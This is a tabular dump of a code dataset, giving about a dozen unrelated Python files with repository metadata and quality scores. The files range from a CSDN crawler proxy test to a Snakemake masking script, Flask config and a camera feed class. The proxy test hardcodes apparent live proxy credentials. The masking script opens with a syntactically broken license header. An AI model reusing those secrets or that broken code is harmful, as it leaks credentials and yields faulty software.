hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb7fc096b934fb70ce80d9b25b9920992168492e | 824 | py | Python | python-CSDN博客爬虫/CSDN_article/csdn/test.py | wangchuanli001/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 12 | 2019-12-07T01:44:55.000Z | 2022-01-27T14:13:30.000Z | python-CSDN博客爬虫/CSDN_article/csdn/test.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 23 | 2020-05-23T03:56:33.000Z | 2022-02-28T07:54:45.000Z | python-CSDN博客爬虫/CSDN_article/csdn/test.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 7 | 2019-12-20T04:48:56.000Z | 2021-11-19T02:23:45.000Z | import random
import MySQLdb
import requests
# ! -*- encoding:utf-8 -*-
import requests
# 要访问的目标页面
targetUrl = "https://blog.csdn.net/wang978252321/article/details/95489446"
# targetUrl = "http://proxy.abuyun.com/switch-ip"
# targetUrl = "http://proxy.abuyun.com/current-ip"
# 代理服务器
proxyHost = "http-dyn.abuyun.com"
proxyPort = "9020"
# 代理隧道验证信息
proxyUser = "HP48W550C1X873PD"
proxyPass = "FED1B0BB31CE94A3"
proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
"host": proxyHost,
"port": proxyPort,
"user": proxyUser,
"pass": proxyPass,
}
proxies = {
"http": proxyMeta,
"https": proxyMeta,
}
resp = requests.get(targetUrl, proxies=proxies)
print(proxyMeta)
print(resp.status_code)
# print(resp.text)
fo = open("proxy_test.txt", 'a', encoding='utf-8')
fo.write(proxyMeta)
fo.close()
| 19.619048 | 74 | 0.684466 | 100 | 824 | 5.62 | 0.54 | 0.048043 | 0.042705 | 0.085409 | 0.096085 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054775 | 0.135922 | 824 | 41 | 75 | 20.097561 | 0.734551 | 0.196602 | 0 | 0.08 | 0 | 0 | 0.308869 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.12 | 0.16 | 0 | 0.16 | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cb80caec425effb53efd7354ad0dff729134141a | 803 | py | Python | setup.py | codecov/tornpsql | 6d24b20db6ba554064edd747febeea5028bd2e84 | [
"Apache-2.0"
] | null | null | null | setup.py | codecov/tornpsql | 6d24b20db6ba554064edd747febeea5028bd2e84 | [
"Apache-2.0"
] | 2 | 2019-10-01T07:31:06.000Z | 2020-10-29T15:53:39.000Z | setup.py | codecov/tornpsql | 6d24b20db6ba554064edd747febeea5028bd2e84 | [
"Apache-2.0"
] | 3 | 2020-08-27T00:03:18.000Z | 2021-05-30T02:04:57.000Z | from setuptools import setup
setup(name='tornpsql',
version='2.1.5',
description="PostgreSQL handler for Tornado Web",
long_description="",
classifiers=["Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2.7",
"Programming Language :: SQL",
"Topic :: Database"],
keywords='tornado psql postgres postgresql sql',
author='Steve Peak',
author_email='steve@stevepeak.net',
url='https://github.com/stevepeak/tornpsql',
license='Apache v2.0',
packages=['tornpsql'],
include_package_data=True,
zip_safe=True,
install_requires=["psycopg2>=2.5.2"],
entry_points="")
| 36.5 | 72 | 0.597758 | 82 | 803 | 5.768293 | 0.743902 | 0.080338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020443 | 0.268991 | 803 | 21 | 73 | 38.238095 | 0.785349 | 0 | 0 | 0 | 0 | 0 | 0.444583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb811398470b8cc79c6cd844862ffc7058f5bb1b | 7,392 | py | Python | workflow/scripts/mask-contigs.py | AKBrueggemann/snakemake-workflow-sars-cov2 | e4cfe0f2f93efc6b45ede0183070bff81f08f502 | [
"BSD-2-Clause"
] | null | null | null | workflow/scripts/mask-contigs.py | AKBrueggemann/snakemake-workflow-sars-cov2 | e4cfe0f2f93efc6b45ede0183070bff81f08f502 | [
"BSD-2-Clause"
] | null | null | null | workflow/scripts/mask-contigs.py | AKBrueggemann/snakemake-workflow-sars-cov2 | e4cfe0f2f93efc6b45ede0183070bff81f08f502 | [
"BSD-2-Clause"
] | null | null | null | '# Copyright ' + str(datetime.datetime.now().year) + ' Thomas Battenfeld, Alexander Thomas, Johannes Köster.'
'# Licensed under the GNU GPLv3 license (https://opensource.org/licenses/GPL-3.0)'
'# This file may not be copied, modified, or distributed'
'# except according to those terms.
'
'# Copyright 2021 Thomas Battenfeld, Alexander Thomas, Johannes Köster.'
'# Licensed under the GNU GPLv3 license (https://opensource.org/licenses/GPL-3.0)'
'# This file may not be copied, modified, or distributed'
'# except according to those terms.
'
'Copyright 2021 Thomas Battenfeld, Alexander Thomas, Johannes Köster.
'
'Licensed under the GNU GPLv3 license (https://opensource.org/licenses/GPL-3.0)
'
'This file may not be copied, modified, or distributed
'
'except according to those terms.
'
sys.stderr = open(snakemake.log[0], "w")
import pysam
def extract_coverage_and_mask(
bamfile_path: str,
sequence_path: str,
masked_sequence_path: str,
coverage_path: str,
min_coverage: int,
min_allele: float,
coverage_header: str = "#CHROM\tPOS\tCoverage\n",
) -> None:
"""Masks positions below a certain coverage with "N". Outputs the coverage per position in a separate file.
Args:
bamfile_path (str): Path to bamfile (.bam)
sequence_path (str): Path to sequence (.fasta)
sequence_path_index (str): Path to sequence index (.fasta.idx)
masked_sequence_path (str): Path to write masked sequence to (.fasta)
coverage_path (str): Path to write coverage per positions to (.txt)
min_coverage (int): Minimal coverage at position to achive. Else apply masking with "N"
min_allele (float): Minimal Allele frequency of base to achive. If not reach, masking base with "N".
coverage_header (str, optional): Content of the header in the coverage file. Defaults to "#CHROM\tPOS\tCoverage\n".
Raises:
ValueError: if sequence contains more than one reference / contig.
"""
# source: https://www.bioinformatics.org/sms/iupac.html
IUPAC = {
"R": ["A", "G"],
"Y": ["C", "T"],
"S": ["G", "C"],
"W": ["A", "T"],
"K": ["G", "T"],
"M": ["A", "C"],
"B": ["C", "G", "T"],
"D": ["A", "G", "T"],
"H": ["A", "C", "T"],
"V": ["A", "C", "G"],
"N": ["A", "C", "T", "G"],
}
# sort iupac for later matching
for key, values in IUPAC.items():
IUPAC[key] = sorted(values)
# context managers for bamfile reader, sequence reader and coverage writer
with pysam.AlignmentFile(bamfile_path, "rb") as bamfile, open(
sequence_path
) as sequence_handle, open(coverage_path, "w") as coverage:
# get sequence(s) in fasta file
# TODO replace FASTA parsing with pysam code
sequence_dict = {}
for line in sequence_handle:
line = line.strip()
if line.startswith(">"):
key = line
sequence_dict[key] = ""
else:
sequence_dict[key] += line
if len(sequence_dict.keys()) > 1:
raise ValueError("Sequence contains more than one contig.")
# convert sequence string to list of characters so that we can change characters
sequence = list(list(sequence_dict.values())[0])
# write header of coverage file
if len(coverage_header) > 0:
coverage.write(coverage_header)
# pileup reads per position
for pileupcolumn in bamfile.pileup(ignore_overlaps=False):
# write name, pos and coverage to coverage file
coverage.write(
"%s\t%s\t%s\n"
% (
pileupcolumn.reference_name,
pileupcolumn.reference_pos,
pileupcolumn.nsegments,
)
)
# check if there is enough coverage at poisition
if pileupcolumn.nsegments < min_coverage:
# log the masking
print(
"Coverage of base %s at pos. %s = %s. Masking with N."
% (
sequence[pileupcolumn.reference_pos],
pileupcolumn.reference_pos,
pileupcolumn.nsegments,
),
file=sys.stderr,
)
# mask the position
sequence[pileupcolumn.reference_pos] = "N"
# check Allele frequency of base
else:
# get all base in read for pileup base
pileupread_base_count = {}
for pileupread in pileupcolumn.pileups:
if not pileupread.is_del and not pileupread.is_refskip:
read_base = pileupread.alignment.query_sequence[
pileupread.query_position
]
if read_base not in pileupread_base_count.keys():
pileupread_base_count[read_base] = 1
else:
pileupread_base_count[read_base] += 1
# calc Allele frequency
try:
base_allel_freq = (
pileupread_base_count[sequence[pileupcolumn.reference_pos]]
/ pileupcolumn.nsegments
)
except:
base_allel_freq = 0
# if Allele frequency is lower than treshold, then
if base_allel_freq < min_allele:
bases = sorted(list(pileupread_base_count.keys()))
# mask base with corresonding IUPAC code
if len(bases) > 1:
for key, values in IUPAC.items():
if values == bases:
iupac_mask = key
break
# mask the 1 base with "N"
else:
iupac_mask = "N"
# log when masking occures
print(
"Coverage of base %s at pos. %s = %s with Allel frequency = %s. Bases in reads: %s. Masking with %s."
% (
sequence[pileupcolumn.reference_pos],
pileupcolumn.reference_pos,
pileupcolumn.nsegments,
base_allel_freq,
pileupread_base_count,
iupac_mask,
),
file=sys.stderr,
)
sequence[pileupcolumn.reference_pos] = iupac_mask
# join list of characters to sequence
sequence = "".join(sequence)
# TODO replace this mess with more clearer code
header = list(sequence_dict.keys())[0].split(".")[0] + "\n"
# write masked fasta file
with open(masked_sequence_path, "w") as w:
print(header, file=w)
print(sequence, file=w)
if __name__ == "__main__":
extract_coverage_and_mask(
snakemake.input.bamfile,
snakemake.input.sequence,
snakemake.output.masked_sequence,
snakemake.output.coverage,
snakemake.params.min_coverage,
snakemake.params.min_allele,
)
| 37.145729 | 125 | 0.540449 | 796 | 7,392 | 4.898241 | 0.257538 | 0.048474 | 0.049243 | 0.055399 | 0.294947 | 0.239292 | 0.196204 | 0.196204 | 0.196204 | 0.142857 | 0 | 0.005975 | 0.366071 | 7,392 | 198 | 126 | 37.333333 | 0.826078 | 0.120536 | 0 | 0.216418 | 0 | 0.029851 | 0.121517 | 0.004056 | 0 | 0 | 0 | 0.005051 | 0 | 0 | null | null | 0 | 0.007463 | null | null | 0.029851 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb81a1e07f6c274ad26ad849f859995ac2573b0c | 638 | py | Python | prototyper/build/stages/wsgi_app.py | vitalik/django-prototyper | 0bf7b2437c45868d2ee90c7c4d69c7d71247c978 | [
"MIT"
] | 114 | 2018-03-19T14:45:22.000Z | 2022-02-07T20:42:28.000Z | prototyper/build/stages/wsgi_app.py | vitalik/django-prototyper | 0bf7b2437c45868d2ee90c7c4d69c7d71247c978 | [
"MIT"
] | 7 | 2018-05-04T13:35:20.000Z | 2022-02-10T12:03:46.000Z | prototyper/build/stages/wsgi_app.py | vitalik/django-prototyper | 0bf7b2437c45868d2ee90c7c4d69c7d71247c978 | [
"MIT"
] | 8 | 2018-06-25T08:09:06.000Z | 2022-02-07T20:42:36.000Z | from ..base import BuildStage
from pathlib import Path
TPL = """\"\"\"
WSGI config for {0} project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
\"\"\"
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "{0}")
application = get_wsgi_application()
"""
class WsgiStage(BuildStage):
def run(self):
wsgi_py = Path(self.build.settings_pckg_path) / 'wsgi.py'
wsgi_py.write_text(TPL.format(self.settings_module('settings')))
| 23.62963 | 78 | 0.730408 | 90 | 638 | 5.044444 | 0.611111 | 0.039648 | 0.079295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00726 | 0.136364 | 638 | 26 | 79 | 24.538462 | 0.816697 | 0 | 0 | 0 | 0 | 0 | 0.619122 | 0.10815 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.235294 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb82a4817e12d6d4179e7cddccb7eec72aa3842a | 399 | py | Python | tests/test_http_api.py | b2wads/baas-transfer | ce2b62c2bed3a06ec85faf1e30fa86d12ede6fea | [
"BSD-3-Clause"
] | null | null | null | tests/test_http_api.py | b2wads/baas-transfer | ce2b62c2bed3a06ec85faf1e30fa86d12ede6fea | [
"BSD-3-Clause"
] | 2 | 2021-03-31T19:48:34.000Z | 2021-12-13T20:48:54.000Z | tests/test_http_api.py | b2wads/baas-transfer | ce2b62c2bed3a06ec85faf1e30fa86d12ede6fea | [
"BSD-3-Clause"
] | 1 | 2020-03-16T15:10:22.000Z | 2020-03-16T15:10:22.000Z | from aioresponses import aioresponses
from asynctest import TestCase
from asyncworker.testing import HttpClientContext
from baas.api import app
class TransferAPITest(TestCase):
async def test_health(self):
async with HttpClientContext(app) as client:
resp = await client.get("/health")
data = await resp.json()
self.assertEqual({"OK": True}, data)
| 28.5 | 52 | 0.701754 | 46 | 399 | 6.065217 | 0.630435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220551 | 399 | 13 | 53 | 30.692308 | 0.897106 | 0 | 0 | 0 | 0 | 0 | 0.022556 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0 | false | 0 | 0.4 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
cb8782c8d3ed5f70ac8e8fb4474a4810fb8ff2aa | 1,276 | py | Python | cvisionlib/camfeed.py | methusael13/cvision | 4f147cd91bf43704662fe32960e6c98057ef5eac | [
"MIT"
] | 2 | 2018-01-15T14:38:35.000Z | 2018-03-04T10:00:28.000Z | cvisionlib/camfeed.py | methusael13/cvision | 4f147cd91bf43704662fe32960e6c98057ef5eac | [
"MIT"
] | null | null | null | cvisionlib/camfeed.py | methusael13/cvision | 4f147cd91bf43704662fe32960e6c98057ef5eac | [
"MIT"
] | null | null | null | '''
Author: Methusael Murmu
Module implementing parallel Camera I/O feed
'''
import cv2
from threading import Thread
class CameraFeedException(Exception):
def __init__(self, src, msg = None):
if msg is None:
msg = 'Unable to open camera devive: %d' % src
super(CameraFeedException, self).__init__(msg)
class CameraFeed:
def __init__(self, src = 0):
self.__stream = cv2.VideoCapture(src)
if not self.__stream.isOpened():
raise CameraFeedException(src)
self.__active = True
self.__ret, self.__frame = self.__stream.read()
self.__cam_thread = None
@property
def stream(self):
return self.__stream
def read(self):
return self.__ret, self.__frame
def start(self):
if self.__cam_thread is None:
self.__cam_thread = Thread(target = self.update)
self.__cam_thread.start()
def update(self):
while True:
self.__ret, self.__frame = self.__stream.read()
if not self.__active:
break
def stop(self):
self.__active = False
def release(self):
while self.__cam_thread.is_alive(): pass
self.__stream.release()
self.__cam_thread = None
| 25.019608 | 60 | 0.61442 | 151 | 1,276 | 4.788079 | 0.377483 | 0.082988 | 0.107884 | 0.06639 | 0.094053 | 0.094053 | 0.094053 | 0.094053 | 0 | 0 | 0 | 0.003322 | 0.29232 | 1,276 | 50 | 61 | 25.52 | 0.797342 | 0.053292 | 0 | 0.114286 | 0 | 0 | 0.026846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.228571 | false | 0.028571 | 0.057143 | 0.057143 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb905a1474b77d18994505f88c59914d489cc249 | 512 | py | Python | verify_package_installs.py | lukassnoek/ICON2017_MVPA | 89af3be9b9565cd8a9f6be940edb1c870b5a1c9d | [
"MIT"
] | 19 | 2017-08-06T06:30:21.000Z | 2021-11-02T10:37:48.000Z | verify_package_installs.py | lukassnoek/ICON2017_MVPA | 89af3be9b9565cd8a9f6be940edb1c870b5a1c9d | [
"MIT"
] | 1 | 2017-08-06T11:44:10.000Z | 2017-08-06T11:44:10.000Z | verify_package_installs.py | lukassnoek/ICON2017_MVPA | 89af3be9b9565cd8a9f6be940edb1c870b5a1c9d | [
"MIT"
] | 6 | 2017-08-06T07:08:12.000Z | 2020-06-04T09:22:28.000Z | import warnings
import os
from importlib import import_module
packages = ['sklearn', 'nibabel', 'numpy',
'matplotlib', 'skbold', 'niwidgets', 'scipy']
warnings.filterwarnings("ignore")
for package in packages:
try:
import_module(package)
print('%s was succesfully installed!' % package)
except ImportError:
print('\nCould not find package %s' % package)
cmd = "pip install %s" % package
print('Install %s using the command: %s\n' % (package, cmd))
| 26.947368 | 68 | 0.642578 | 58 | 512 | 5.637931 | 0.637931 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.232422 | 512 | 18 | 69 | 28.444444 | 0.832061 | 0 | 0 | 0 | 0 | 0 | 0.310547 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.357143 | 0 | 0.357143 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
cb91cfb48f8d827ab0cbcfd61e22339fb73c61b6 | 296 | py | Python | python_practice/decorators.py | vishalvb/practice | 4c38f863408c91aa072bd20510f098043fecd043 | [
"MIT"
] | null | null | null | python_practice/decorators.py | vishalvb/practice | 4c38f863408c91aa072bd20510f098043fecd043 | [
"MIT"
] | null | null | null | python_practice/decorators.py | vishalvb/practice | 4c38f863408c91aa072bd20510f098043fecd043 | [
"MIT"
] | null | null | null | #decorators
def decorator(myfunc):
def wrapper(*args):
return myfunc(*args)
return wrapper
@decorator
def display():
print('display function')
@decorator
def info(name, age):
print('name is {} and age is {}'.format(name,age))
info('john', 23)
#hi = decorator(display)
#hi()
display() | 14.095238 | 51 | 0.682432 | 40 | 296 | 5.05 | 0.475 | 0.09901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007937 | 0.148649 | 296 | 21 | 52 | 14.095238 | 0.793651 | 0.125 | 0 | 0.166667 | 0 | 0 | 0.171206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.083333 | 0.5 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb930e85278de85a62b2b49b52741474d0c750b3 | 342 | py | Python | old_app/app.py | kelj0/GPGdotgetter | 619ada58598fefbd9a5f33d50a15df7f35996d1e | [
"MIT"
] | null | null | null | old_app/app.py | kelj0/GPGdotgetter | 619ada58598fefbd9a5f33d50a15df7f35996d1e | [
"MIT"
] | 7 | 2021-04-02T10:26:34.000Z | 2021-04-03T21:15:37.000Z | old_app/app.py | kelj0/GPGdotgetter | 619ada58598fefbd9a5f33d50a15df7f35996d1e | [
"MIT"
] | null | null | null | from flask import Flask
app = Flask('savedots')
app.config['DATABASE_FILE'] = 'savedots_DB.sqlite'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///savedots_DB.sqlite'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = "CHANGE_ME"
if __name__ == '__main__':
print("Please run main.py to start server")
exit(1)
| 26.307692 | 70 | 0.736842 | 47 | 342 | 5 | 0.659574 | 0.114894 | 0.13617 | 0.161702 | 0.297872 | 0.297872 | 0 | 0 | 0 | 0 | 0 | 0.003322 | 0.119883 | 342 | 12 | 71 | 28.5 | 0.777409 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.236842 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb9357f27908177cf2214963118161546dd6dd87 | 1,765 | py | Python | nnet/trans_func.py | Bhumbra/Nnet | aa8a8891d28cb2244668093f90e1909be79314bd | [
"BSD-3-Clause"
] | 1 | 2021-07-07T21:11:27.000Z | 2021-07-07T21:11:27.000Z | nnet/trans_func.py | Bhumbra/Nnet | aa8a8891d28cb2244668093f90e1909be79314bd | [
"BSD-3-Clause"
] | null | null | null | nnet/trans_func.py | Bhumbra/Nnet | aa8a8891d28cb2244668093f90e1909be79314bd | [
"BSD-3-Clause"
] | null | null | null | # Transfer functions and derivatives
# Note _all_ transfer functions and derivatives _must_ accept keyword arguments
# and handle the output keyword argument out=z correctly.
# Gary Bhumbra
import numpy as np
import scipy.special
#-------------------------------------------------------------------------------
"""
def sigval(x, **kwds):
# return 1./(1+exp(-x))
# return 0.5 * np.tanh(0.5*x) + 0.5
z = kwds["out"] if "out" in kwds else np.empty_like(x)
np.multiply(x, 0.5, out=z)
np.tanh(z, out=z)
np.multiply(z, 0.5, out=z)
np.add(z, 0.5, out=z)
return z
"""
sigval = scipy.special.expit
#-------------------------------------------------------------------------------
def sigder(x, **kwds):
#y = sigval(x); return (1.-y)*y
z = kwds["out"] if "out" in kwds else np.empty_like(x)
y = kwds["val"] if "val" in kwds else sigval(x)
np.subtract(1., y, out=z)
np.multiply(z, y, out=z)
return z
#-------------------------------------------------------------------------------
def ReLU(x, **kwds):
z = kwds["out"] if "out" in kwds else np.empty_like(x)
y = kwds["ind"] if "ind" in kwds else x < 0
np.copyto(z, x, casting='no')
z[y].fill(0.)
return z
#-------------------------------------------------------------------------------
def ReDU(x, **kwds):
z = kwds["out"] if "out" in kwds else np.empty_like(x)
y = kwds["ind"] if "ind" in kwds else x < 0
z.fill(1.)
z[y].fill(0.)
return z
#-------------------------------------------------------------------------------
TRANSFER_FUNCTION_DERIVATIVE = {'none': (None, None),
'sigm': (sigval, sigder),
'relu': (ReLU, ReDU)}
#-------------------------------------------------------------------------------
| 32.090909 | 80 | 0.430595 | 227 | 1,765 | 3.303965 | 0.255507 | 0.037333 | 0.093333 | 0.053333 | 0.381333 | 0.310667 | 0.273333 | 0.273333 | 0.273333 | 0.273333 | 0 | 0.014384 | 0.172805 | 1,765 | 54 | 81 | 32.685185 | 0.499315 | 0.388669 | 0 | 0.416667 | 0 | 0 | 0.062344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb9f2ac1408c2f916e30ffa4b8d707e4f3ab1eff | 2,281 | py | Python | config/scripts/dados-pygen/models.py | uhndev/hateoas-server | 7eac7928b9fb3be2ffcd9ec1eb833ba533333e98 | [
"Unlicense",
"MIT"
] | null | null | null | config/scripts/dados-pygen/models.py | uhndev/hateoas-server | 7eac7928b9fb3be2ffcd9ec1eb833ba533333e98 | [
"Unlicense",
"MIT"
] | null | null | null | config/scripts/dados-pygen/models.py | uhndev/hateoas-server | 7eac7928b9fb3be2ffcd9ec1eb833ba533333e98 | [
"Unlicense",
"MIT"
] | null | null | null | import random
import config
from faker import Factory
fake = Factory.create()
class User:
def __init__(self):
self.username = fake.user_name()
